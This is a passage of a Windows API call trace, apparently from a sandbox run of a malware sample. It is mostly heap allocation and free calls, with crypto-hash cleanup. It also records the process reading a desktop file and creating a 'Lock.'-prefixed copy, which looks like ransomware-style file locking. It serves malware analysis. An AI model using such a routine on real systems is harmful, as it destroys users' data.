0x24b6d00 [0161.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.646] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0161.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0161.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.647] CryptDestroyHash (hHash=0xaa55e0) returned 1 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0161.655] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.655] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0161.655] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.655] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.655] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.academics.pdf.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0161.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0161.656] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0161.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0161.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.657] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0161.657] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.658] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.659] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.660] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.661] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.663] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.666] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.667] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.668] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.670] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.671] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.673] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.674] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0161.676] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xfd0d, lpOverlapped=0x0) returned 1 [0161.677] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0161.702] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 